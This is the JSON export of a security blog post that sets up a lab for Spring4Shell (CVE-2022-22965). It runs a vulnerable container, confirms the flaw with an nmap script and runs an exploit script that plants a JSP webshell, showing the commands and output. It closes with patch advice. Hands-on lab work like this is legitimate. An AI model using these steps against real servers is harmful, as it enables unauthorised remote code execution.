{"id":1246,"date":"2022-04-13T23:45:19","date_gmt":"2022-04-13T15:45:19","guid":{"rendered":"\/?p=1246"},"modified":"2022-04-13T23:45:19","modified_gmt":"2022-04-13T15:45:19","slug":"setting-up-a-spring4shell-lab-cve-2022-22965","status":"publish","type":"post","link":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","title":{"rendered":"Setting up a Spring4Shell Lab CVE-2022-22965"},"content":{"rendered":"

As described by the Mitre CVE Database<\/a> – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. Spring4Shell has affected a wide variety of vendors products including Cisco, VMware, Fortinet etc.<\/p>\n

OK so lets get to labbing this one!
\nDisclaimer – never test on a production network. Always have permission. The following method is for a LAB environment only.<\/strong><\/p>\n

Prerequisites:<\/strong>
\nYou will need a Linux VM capable of running Docker. Im using Ubuntu 20.x. Host IP for this example is 10.1.1.1\/24
\nA secondary host to run the nmap scan (can be any OS as long as it supports nmap and the scripting engine). IP for my nmap host is 10.1.1.10\/24<\/p>\n

Method<\/strong>
\n1. Install docker on your Ubuntu VM and run the Spring4Shell container pre made by reznok <\/a>on Github:
\nsudo apt install docker.io
\nsudo docker build . -t spring4shell && sudo docker run -p 8080:8080 spring4shell<\/code>
\nApp will now be available at http:\/\/10.1.1.1:8080\/helloworld\/greeting<\/p>\n

2. Clone the Spring4Shell NSE from gpiechnik2 on Github<\/a>
\nSave it to your scanning host. In this example I used Windows. Run it against the target to confirm the vulnerability:
\nSpring4Shell>nmap -v -sS --script=spring4shell.nse 10.1.1.1
\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2022-04-13 23:08 W. Australia Standard Time
\nInitiating NSE at 23:08
\nCompleted NSE at 23:08, 0.00s elapsed
\nScanning 10.1.1.1 [1 port]\nInitiating SYN Stealth Scan at 23:08
\nScanning 10.1.1.1 [1000 ports]\nDiscovered open port 8080\/tcp on 10.1.1.1
\nDiscovered open port 22\/tcp on 10.1.1.1
\nCompleted SYN Stealth Scan at 23:08, 0.07s elapsed (1000 total ports)
\nNSE: Script scanning 10.1.1.1
\nInitiating NSE at 23:08
\nCompleted NSE at 23:08, 4.13s elapsed
\nNmap scan report for 10.1.1.1
\nHost is up (0.00036s latency).
\nNot shown: 998 closed tcp ports (reset)
\nPORT STATE SERVICE
\n22\/tcp open ssh
\n8080\/tcp open http-proxy
\n| spring4shell:
\n| VULNERABLE:
\n| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
\n| State: VULNERABLE
\n| IDs: CVE:CVE-2022-22965
\n| Check results:
\n| 10.1.1.1:8080\/shell.jsp?pwd=j&cmd=id
\n| Extra information:
\n| TESTED URL: 10.1.1.1:8080
\n| PATH:
\n| COMMAND: id
\n| ASSERTION: uid
\n| References:
\n|_ https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-22965
\nMAC Address: 00:0C:29:5C:08:93 (VMware)<\/code>
\nOK confirmed the host is vulnerable. Lets move on to the exploit.<\/p>\n

3. Save the exploit.py to your scanning host and execute with python (you may need to install python3 and pip the requests module):
\nC:\\Spring4Shell>python .\\exploit.py --url http:\/\/10.1.1.1:8080\/helloworld\/greeting --file shell
\n[*] Resetting Log Variables.
\n[*] Response code: 200
\n[*] Modifying Log Configurations
\n[*] Response code: 200
\n[*] Response Code: 200
\n[*] Resetting Log Variables.
\n[*] Response code: 200
\n[+] Exploit completed
\n[+] Check your target for a shell
\n[+] File: shell.jsp
\n[+] Shell should be at: http:\/\/10.1.1.1:8080\/shell.jsp?cmd=id<\/code><\/p>\n

4. Test the webshell in a browser. Use unicode for spaces (%20) etc:
\n\"Spring4Shell<\/a>
\n\"Spring4Shell<\/a>
\nProfit.<\/p>\n

Mitigation<\/strong>
\nPatch!
\nCheck the notes on the Spring Framework website here<\/a>.
\nSpring4Shell was patched quickly due to the RCE nature of the vulnerability. Vendors that use the Spring Framework have released their own patches.<\/p>\n","protected":false},"excerpt":{"rendered":"

As described by the Mitre CVE Database – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code…<\/p>\n","protected":false},"author":2,"featured_media":1251,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,10],"tags":[85,166],"class_list":["post-1246","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-attack","category-security","tag-cve-2022-22965","tag-spring4shell"],"acf":[],"yoast_head":"\nSetting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire\" \/>\n<meta property=\"og:description\" content=\"As described by the Mitre CVE Database – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\" \/>\n<meta property=\"og:site_name\" content=\"Insecure Wire\" \/>\n<meta property=\"article:published_time\" content=\"2022-04-13T15:45:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"627\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"nikonau\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/insecurewire\" \/>\n<meta name=\"twitter:site\" content=\"@insecurewire\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"nikonau\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"},\"author\":{\"name\":\"nikonau\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\"},\"headline\":\"Setting up a Spring4Shell Lab CVE-2022-22965\",\"datePublished\":\"2022-04-13T15:45:19+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"},\"wordCount\":323,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"keywords\":[\"CVE-2022-22965\",\"Spring4Shell\"],\"articleSection\":[\"Attack\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\",\"url\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\",\"name\":\"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire\",\"isPartOf\":{\"@id\":\"https:\/\/www.insecurewi.re\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"datePublished\":\"2022-04-13T15:45:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg\",\"width\":1200,\"height\":627,\"caption\":\"spring4shell\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.insecurewi.re\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Setting up a Spring4Shell Lab CVE-2022-22965\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.insecurewi.re\/#website\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"name\":\"Insecure Wire\",\"description\":\"A Network Engineer\u2019s Perspective.\",\"publisher\":{\"@id\":\"https:\/\/www.insecurewi.re\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.insecurewi.re\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.insecurewi.re\/#organization\",\"name\":\"Insecure Wire\",\"url\":\"https:\/\/www.insecurewi.re\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"contentUrl\":\"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png\",\"width\":32,\"height\":32,\"caption\":\"Insecure Wire\"},\"image\":{\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/insecurewire\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d\",\"name\":\"nikonau\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g\",\"caption\":\"nikonau\"},\"sameAs\":[\"https:\/\/x.com\/https:\/\/twitter.com\/insecurewire\"],\"url\":\"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","og_locale":"en_US","og_type":"article","og_title":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","og_description":"As described by the Mitre CVE Database – A Spring MVC or Spring WebFlux application running on Java 9+ may be vulnerable to remote code...","og_url":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","og_site_name":"Insecure Wire","article_published_time":"2022-04-13T15:45:19+00:00","og_image":[{"width":1200,"height":627,"url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","type":"image\/jpeg"}],"author":"nikonau","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/insecurewire","twitter_site":"@insecurewire","twitter_misc":{"Written by":"nikonau","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#article","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"},"author":{"name":"nikonau","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d"},"headline":"Setting up a Spring4Shell Lab CVE-2022-22965","datePublished":"2022-04-13T15:45:19+00:00","mainEntityOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"},"wordCount":323,"commentCount":0,"publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","keywords":["CVE-2022-22965","Spring4Shell"],"articleSection":["Attack","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","url":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/","name":"Setting up a Spring4Shell Lab CVE-2022-22965 - Insecure Wire","isPartOf":{"@id":"https:\/\/www.insecurewi.re\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"image":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage"},"thumbnailUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","datePublished":"2022-04-13T15:45:19+00:00","breadcrumb":{"@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#primaryimage","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2022\/04\/spring4shell.jpg","width":1200,"height":627,"caption":"spring4shell"},{"@type":"BreadcrumbList","@id":"https:\/\/www.insecurewi.re\/index.php\/2022\/04\/13\/setting-up-a-spring4shell-lab-cve-2022-22965\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.insecurewi.re\/"},{"@type":"ListItem","position":2,"name":"Setting up a Spring4Shell Lab CVE-2022-22965"}]},{"@type":"WebSite","@id":"https:\/\/www.insecurewi.re\/#website","url":"https:\/\/www.insecurewi.re\/","name":"Insecure Wire","description":"A Network Engineer\u2019s Perspective.","publisher":{"@id":"https:\/\/www.insecurewi.re\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.insecurewi.re\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.insecurewi.re\/#organization","name":"Insecure Wire","url":"https:\/\/www.insecurewi.re\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/","url":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","contentUrl":"https:\/\/www.insecurewi.re\/wp-content\/uploads\/2023\/10\/cloud.png","width":32,"height":32,"caption":"Insecure Wire"},"image":{"@id":"https:\/\/www.insecurewi.re\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/insecurewire"]},{"@type":"Person","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/8ba08b41fc754b971a948ead6ccb777d","name":"nikonau","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.insecurewi.re\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2d1b9d9dc90da4f6d3da31b870f418c6b3553ba9be48d53e8ee3a35b0adb1d35?s=96&d=mm&r=g","caption":"nikonau"},"sameAs":["https:\/\/x.com\/https:\/\/twitter.com\/insecurewire"],"url":"https:\/\/www.insecurewi.re\/index.php\/author\/nikon\/"}]}},"_links":{"self":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1246","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/comments?post=1246"}],"version-history":[{"count":0,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/posts\/1246\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media\/1251"}],"wp:attachment":[{"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/media?parent=1246"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/categories?post=1246"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.insecurewi.re\/index.php\/wp-json\/wp\/v2\/tags?post=1246"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}